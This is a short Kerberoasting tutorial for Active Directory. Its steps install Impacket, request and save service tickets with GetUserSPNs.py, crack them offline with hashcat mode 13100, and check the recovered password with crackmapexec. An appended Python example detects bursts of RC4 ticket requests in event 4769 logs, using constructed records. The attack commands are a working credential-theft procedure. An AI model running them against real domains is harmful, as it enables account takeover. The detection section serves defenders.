Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information. We do not encourage any kind of illegal or harmful activity.
- Clone the Impacket repository:
git clone https://github.com/SecureAuthCorp/impacket.git
- Navigate to the Impacket directory:
cd impacket
- Install Impacket using pip:
sudo python3 -m pip install .
STEP 2: LISTING ACCOUNTS AND REQUESTING TGS TICKETS
- Listing SPN Accounts
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME]
- Requesting TGS Tickets
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request
STEP 3: REQUESTING SPECIFIC TGS TICKETS AND SAVING TO FILE
- Requesting a Specific TGS Ticket
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME]
- Saving TGS Tickets to a File
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME] -outputfile [OUTPUT-FILE]
STEP 4: CRACKING TGS TICKETS AND CONFIRMING ACCESS
- Cracking TGS Tickets Offline
hashcat -m 13100 [TGS-FILE] /usr/share/wordlists/rockyou.txt
- Confirm access with the cracked credentials:
crackmapexec smb [DC-IP] -u [USERNAME] -p [PASSWORD]
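
What the ticket requests in Steps 2 and 3 look like from the domain controller's side, as an added detection example that is not part of the original walkthrough. It assumes Kerberos service ticket auditing is enabled so that Security event 4769 is logged; the field names follow that event, while the records, account names, time window and threshold are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 works on

# Constructed records shaped like Windows Security event 4769
# ("A Kerberos service ticket was requested"); all values are made up.
EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:04", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:01:00", "TargetUserName": "asmith@CORP.EXAMPLE",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:02:00", "TargetUserName": "asmith@CORP.EXAMPLE",
     "ServiceName": "FILESRV01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T11:30:00", "TargetUserName": "asmith@CORP.EXAMPLE",
     "ServiceName": "svc_legacy", "TicketEncryptionType": "0x17"},
]

def find_roasting(events, window=timedelta(minutes=5), threshold=3):
    """Return {account: [services]} for accounts that requested RC4 tickets
    for at least `threshold` distinct user-backed services inside `window`."""
    per_account = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769:
            continue
        if int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue  # AES tickets (0x11/0x12) are not what mode 13100 handles
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # skip machine accounts and krbtgt: long random keys
        when = datetime.fromisoformat(e["TimeCreated"])
        per_account[e["TargetUserName"]].append((when, svc))

    alerts = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            # Distinct services requested within `window` of this request
            seen = {s for t, s in reqs[i:] if t - start <= window}
            if len(seen) >= threshold:
                alerts[account] = sorted(seen)
                break
    return alerts

if __name__ == "__main__":
    for account, services in find_roasting(EVENTS).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

The window and threshold need tuning per environment, since legacy applications that only support RC4 will produce isolated 0x17 requests like the `svc_legacy` record above.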